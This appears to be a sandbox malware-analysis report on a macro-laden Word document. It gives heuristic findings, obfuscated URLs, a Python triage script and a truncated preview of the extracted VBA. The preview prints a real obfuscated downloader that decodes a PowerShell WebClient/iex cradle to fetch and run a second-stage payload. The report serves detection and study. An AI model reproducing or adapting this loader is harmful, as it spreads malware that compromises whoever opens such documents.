Verdict: MALICIOUS (risk score 242)
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic
The sample fires the critical OLE_VBA_SHELL heuristic, meaning the macro calls the VBA Shell() function, and the critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, meaning an auto-executing macro rebuilds its strings through a custom decoder before handing them to an execution sink. In the extracted source (macros.bas) that decoder is the function HJjkJKD, which is called repeatedly with a padded string literal and two numeric arguments. The literal 'amLSTsowZHbPzSfpiS-immob9m4+9m4ilien.de/9m4+9m4J5c9m4+9m4GuUXiELlzSSjmicIjbOdjl' is one of those encoded arguments, not the download URL itself: the 9m4/mWc/cbw tokens and the '+' splices are obfuscation, and the leading and trailing characters are padding that the decoder trims, so the real host and path only exist after decoding. Other literals passed to the same decoder carry recognisable fragments of a PowerShell download cradle (System.Net.WebClient, and $ShellId[1]+$ShellId[13]+'x', which evaluates to iex when $ShellId is Microsoft.PowerShell). The likely chain is therefore: AutoOpen runs, the macro decodes a PowerShell command, Shell() launches it, and PowerShell fetches and executes a second-stage payload from the decoded URL. The p-code heuristic (OLE_VBA_PCODE_AUTOEXEC_EXEC) independently confirms auto-exec plus shell/download tokens in the compiled stream, which matters because the source preview below is truncated. Treat the domain as unconfirmed until the decoder is run or the PowerShell command line is captured in a sandbox.
Heuristics (7)

| Finding | Severity | ID | Description |
|---|---|---|---|
| VBA macros detected (4 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code. |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA. |
| Obfuscated auto-exec VBA loader | critical | OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER | Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source. |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro. |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. Catches p-code-only documents and source-extraction failures where no visible source is available. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. Analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels say which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Extracted URLs (all found in document text, OLE body):
- http://9m4+9m4esenUpr
- http://real-expert.inf9m4mWc+mWc+9m4o9m4+9m4/9m4+9m4co9m4+9m4mp9m4+9m4on9m4+9m4ents/Pt09m4mWc+m
- http://schemas.openxmlformats.org/drawingml/2006/main

The first two entries still carry the same 9m4/mWc junk tokens as the macro strings and are not resolvable as written; the third is the standard DrawingML schema namespace and is not an indicator.
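The summary above and the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER finding both describe the same shape: an auto-exec entry point, a custom decoder called over and over with a padded literal and numeric arguments, and sinks that never appear verbatim in the source. The following Python is an added triage example, not oletools/olevba code and not the sample's own decoder. It runs over extracted macro text such as macros.bas, lists auto-exec procedures, identifies the decoder by its call shape, and peels the two obfuscation layers that are visible without executing the decoder: PowerShell-style literal splices ('+') and paired junk tokens (9m4+9m4, mWc+mWc, cbw+cbw). The embedded VBA excerpt is constructed from the literals shown in the preview; the AutoOpen stub is assumed (the preview cuts off before any entry point), and $ShellId[n] is resolved on the assumption that the victim runs the console host, where $ShellId is "Microsoft.PowerShell".

```python
"""Triage the obfuscated-loader shape from extracted VBA source (added example)."""
import re
from collections import Counter

# Constructed excerpt modelled on the extracted macro. The AutoOpen stub stands in
# for the entry point the OLE_VBA_AUTOOPEN heuristic reports but the preview omits.
SAMPLE_VBA = r'''
Attribute VB_Name = "lSajimqhmQYIO"
Sub AutoOpen()
    YYAfYup
End Sub
Function YYAfYup()
On Error Resume Next
iOETroDWbDf = (vERwzTt - Int(ssEGwz) * uJTGOcpAbYAdo / Oct(woArWf) - (KmqbEhknfiOLn - Sin(4698163)))
RuhwRk = (nEwBPZvWMRilQ) + HJjkJKD("amLSTsowZHbPzSfpiS-imm'+'ob9m4+9m4ilien.de/9m4+9m4J5c9m4+9m4GuUXiELlzSSjmicIjbOdjl", 19, 43)
jjOdPwiK = (oREzDwPzqiM) + HJjkJKD("dpXj9mmWc'+'+mWc4+9m4ectQEk) S9m4+9m4'+'yste9m4+9m4m.Net.We9m4+mWc+mWc9m4bC9'+'m4+9m4liecbw+cbwnt;c79m4+'+'9mcbw+cbw4tNScbw+cbwB9mmWc+mWc4+9m'+'4 cVYDzMQhXAaWJERUIiELBwlbbOwUBoNHhVw", 4, 144)
RQvILFZ = (JQwrsblh) + HJjkJKD("hTTzafhVtPHlpjR &( $ShELLID[1]+$sHELlID[13]+'x')(('. ( ([StrinG]xdCVerboSEpReFEilPu", 16, 64)
End Function
'''

AUTOEXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+(AutoOpen|AutoExec|AutoClose|Document_Open|Workbook_Open)\b",
    re.I | re.M)
# f("literal", n, m): a string literal plus two numeric arguments, the decoder-call shape
DECODER_CALL = re.compile(r'\b([A-Za-z_]\w*)\(\s*"((?:[^"]|"")*)"\s*,\s*\d+\s*,\s*\d+\s*\)')
SPLICE = "'+'"                                    # 'ab'+'cd'  ->  'abcd'
TOKEN_PAIR = re.compile(r"([A-Za-z0-9]{3})\+\1")  # 9m4+9m4, mWc+mWc, cbw+cbw  ->  removed
SHELLID = re.compile(r"\$shellid\[(\d+)\]", re.I)
CONSOLE_SHELLID = "Microsoft.PowerShell"          # assumption: console host, not ISE
SINKS = [("System.Net.WebClient", r"System\.Net\.WebClient"), ("New-Object", r"New-Object"),
         ("DownloadString/File", r"Download(?:String|File)"), ("iex", r"\biex\b"),
         ("Invoke-Expression", r"Invoke-Expression"), ("WScript.Shell", r"WScript\.Shell")]
HOST_PATH = re.compile(r"[A-Za-z0-9-]+\.[a-z]{2,}/[A-Za-z0-9/_-]*")  # heuristic host/path


def auto_exec_entry_points(src):
    """Names of auto-executing procedures defined in the source."""
    return [m.group(1) for m in AUTOEXEC.finditer(src)]


def decoder_literals(src):
    """(decoder name, its string arguments) for the most frequently called f("...", n, m)."""
    calls = DECODER_CALL.findall(src)
    if not calls:
        return None, []
    name = Counter(n for n, _ in calls).most_common(1)[0][0]
    return name, [lit.replace('""', '"') for n, lit in calls if n == name]


def resolve_shellid(s):
    """$ShellId[n] -> 'c' from the console-host string; $ShellId[1]+$ShellId[13]+'x' is iex."""
    def sub(m):
        i = int(m.group(1))
        return "'%s'" % CONSOLE_SHELLID[i] if i < len(CONSOLE_SHELLID) else m.group(0)
    return SHELLID.sub(sub, s)


def peel(lit):
    """Strip splices and paired junk tokens until nothing changes. Padding that the
    numeric arguments trim, and placeholder tokens the sample's own Replace chain
    restores (e.g. QEk), are left in place; this is a triage view, not the decoder."""
    s = resolve_shellid(lit)
    prev = None
    while prev != s:
        prev = s
        s = TOKEN_PAIR.sub("", s.replace(SPLICE, ""))
    return s


def triage(src):
    """Summarise entry points, decoder usage, and the sinks/hosts visible after peeling."""
    name, lits = decoder_literals(src)
    peeled = [peel(l) for l in lits]
    blob = "\n".join(peeled)
    return {
        "auto_exec": auto_exec_entry_points(src),
        "decoder": name,
        "decoder_calls": len(lits),
        "sinks": [label for label, pat in SINKS if re.search(pat, blob, re.I)],
        "host_paths": HOST_PATH.findall(blob),
        "peeled": peeled,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
```

On the constructed excerpt, triage() reports AutoOpen as the entry point, HJjkJKD as the decoder (three calls), System.Net.WebClient and iex as sinks, and one host/path still wrapped in the padding that the decoder's numeric arguments would trim. The pairing of an auto-exec name with a function called this way, plus sinks surfacing only after peeling, is the evidence behind the loader heuristic; the surviving padding is why the domain should not be reported as confirmed from static output alone.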
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26216 bytes | 7120fe1abcbaeee72667657b7b1087c85b80aa546088af999edd4b48f40028c4 |
Script preview (first 1,000 lines of the extracted script; the copy below is cut off)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lSajimqhmQYIO"
Function YYAfYup()
On Error Resume Next
iOETroDWbDf = (vERwzTt - Int(ssEGwz) * uJTGOcpAbYAdo / Oct(woArWf) - (KmqbEhknfiOLn - Sin(4698163)))
INDzBSluJBn = (jlmlFEpZwq - Int(vtDDPb) * EkWdfKuF / Oct(wumRAlV) - (PElalU - Sin(2385564)))
CUnKiRuQ = (lzmrkbOmtioGG - Int(bqArsf) * YEKXzo / Oct(qrTPKjt) - (IObUfzY - Sin(3493746)))
UwLANVsEi = (wncfklMIhSmCsB) + HJjkJKD("fscwLwrkVNHZiRX4ncbw+cbwlzmWcbw+cbwc+mWcV0O9m4mWc+'+'mWc+9m4adFIzV0lmWc+mWc9m4+9m4e9m4+9m4t9mWc+mWcm4+9m47W(cbw+'+'cbwc9m4+9m47tavzwf", 16, 114)
QozsMrAi = (AKzmNIwfh - Int(SZniAjPjvohaCX) * XTcwL / Oct(odEfYMI) - (LoIWBjq - Sin(7297935)))
pODlsLfUMoQ = (WfBBqbqa - Int(cjpoVi) * idwiwbTHT / Oct(zZEAoMlBGQK) - (zBOFRkZ - Sin(4576229)))
clVWbXALG = (SZATFtDTu - Int(uiGbQVG) * XDmPRLXjuUsK / Oct(ivNhADhiSii) - (EQdqawj - Sin(1986358)))
RuhwRk = (nEwBPZvWMRilQ) + HJjkJKD("amLSTsowZHbPzSfpiS-imm'+'ob9m4+9m4ilien.de/9m4+9m4J5c9m4+9m4GuUXiELlzSSjmicIjbOdjl", 19, 43)
TzbDGa = (pUWJznjbidsNl - Int(SzIabE) * wfhRlqzwfAuuC / Oct(fMRlpfKORYE) - (vlVwclqCroor - Sin(2834047)))
EuwtIRVKY = (icwdzTiZnnqpmY - Int(jOJMwuLdjXJ) * zsqYZ / Oct(sziPoalFV) - (iFmzRXHaifRCXz - Sin(3049169)))
oFzIwSKmviK = (oOihwO - Int(TubzTZjb) * YNudkJnckPuuE / Oct(aizimWWoBToTF) - (ZoAuDadJEmUib - Sin(1150339)))
ifKPsc = (suQSZFEVEDNu) + HJjkJKD("FWRodw[STRINg][cHAR]39))jzaD", 7, 18)
jzGXX = (dNOHuQrU - Int(SEAnJUJzwFtzdw) * ZiCAR / Oct(fksllGcpK) - (srbVN - Sin(749677)))
CXIuLHdhJf = (tcFBsY - Int(TzPLiQOr) * inTIC / Oct(NhInCBFCc) - (VUIXMTnMZSmr - Sin(3224698)))
CQQCkiPYs = (upAowi - Int(vGVOYtEWRNzmW) * vFTqLAG / Oct(klWQBtMAQFu) - (aNmJoZjqIFoEuu - Sin(9793381)))
jjOdPwiK = (oREzDwPzqiM) + HJjkJKD("dpXj9mmWc'+'+mWc4+9m4ectQEk) S9m4+9m4'+'yste9m4+9m4m.Net.We9m4+mWc+mWc9m4bC9'+'m4+9m4liecbw+cbwnt;c79m4+'+'9mcbw+cbw4tNScbw+cbwB9mmWc+mWc4+9m'+'4 cVYDzMQhXAaWJERUIiELBwlbbOwUBoNHhVw", 4, 144)
FurIoUhtS = (KBlQPafw - Int(WGudTSUL) * OrCQjh / Oct(hrIzLSIRQ) - (wzRYkrnal - Sin(7307131)))
zOHTcsa = (fwdWhUXq - Int(tUDshjWz) * DzdNzV / Oct(uiiAPqvv) - (Cuibiz - Sin(7256041)))
qbmVHd = (AccwZqBUnT - Int(omSzIBmmtqA) * ZIjfo / Oct(XcGLCMUtYVscf) - (XOHWjvWZrL - Sin(8595316)))
RQvILFZ = (JQwrsblh) + HJjkJKD("hTTzafhVtPHlpjR &( $ShELLID[1]+$sHELlID[13]+'x')(('. ( ([StrinG]xdCVerboSEpReFEilPu", 16, 64)
uifSjAArk = (BNwtVwl - Int(TSNvqkfiPCLhni) * dQGwZRcZbusm / Oct(NUHREfJRsj) - (slLBHMzWW - Sin(5222584)))
WSGimzjOpwz = (cPCMdrsm - Int(zwEUv) * ucHVVlhjDnFaRO / Oct(VPAvssOsCSYFjc) - (hrGLSUPBFjuiw - Sin(4820562)))
HrXUhJzc = (QaXDbiDYD - Int(fkFCw) * wEKFOUFwcGO / Oct(OzKPTiCzhfAKi) - (DImkJwJA - Sin(9247001)))
tqdGskWosz = (jFiPdRtQKYf) + HJjkJKD("vPXOiS,mWccbw+cbw+mWc9m4+9m4 uZhZuEicwkvRicj", 7, 23)
RFEWizwrPH = (EzbwRzJr - Int(PlNBjbzWGcGEfq) * HzOWTjzKC / Oct(YpsMiXSjYE) - (wEMoREuWr - Sin(2676785)))
jpJUvSJniRY = (IFoUinYNR - Int(KXIlHJcFoV) * lwLtBh / Oct(iDnKP) - (hmYKoiKKmwmjED - Sin(2055675)))
ZdOCRCW = (SQDsSWHdahFXjO - Int(zIJEUkRRJKww) * YMziq / Oct(kWHXjKfvjHY) - (aYImXuzqKAzu - Sin(6433804)))
BuXaEWsoZzG = (FtPRaAzw) + HJjkJKD("wrVvGAkuIbcqidvGKXswkvzmvrV+cbwRepLACEcbw+cbw(cbw+cbw9'+'m4cbw+cbwc7t9'+'m4,9m4rh59m4).RepLACE(9m4zPj'+'9m'+'4,cb'+'w+cbw[strIN'+'g]'+'mWc+mWc[CHAr]92) mWc+mWc)cbw+cbwmWc).REPlacE(mWccbw+cbwrh5LbicjRNF", 28, 166)
LGaRhGG = (WatmpCiAY - Int(WMpKlZrVXzF) * trumRFBWSp / Oct(JzzLSY) - (wjbuujvSIPw - Sin(2516290)))
JpHGvjlzw = (nSvjCrCkZwBR - Int(CjLoOZwrAYz) * wNqzwmZFDWrEQJ / Oct(WvXiZdNdPG) - (AXQvntvh - Sin(1104681)))
hdFGDRBDq = (MldMcMdjoH - Int(FwavdqaWj) * atclBoIjwIiD / Oct(KKtWzQkzazvvYq) - (KCVLWtlsAaaXUz - Sin(8222651)))
XcpdHPFzFu = (slduooiJk) + HJjkJKD("FjWc &9m4+c'+'bw+cbw9m4(9m4+9m4QEkn9m4+9m4Q9m4+9m4'+'Ek+QEk9m4cbw+cbw+9m4eQEkmWcbw'+'+cbwc+m'+'Wccbw+cbw+9m'+'4+9m4QEkw-o'+'bj'+'ecQEcbw+cbwk+QEktQmWccbw+cbw+mWc9m
... (truncated)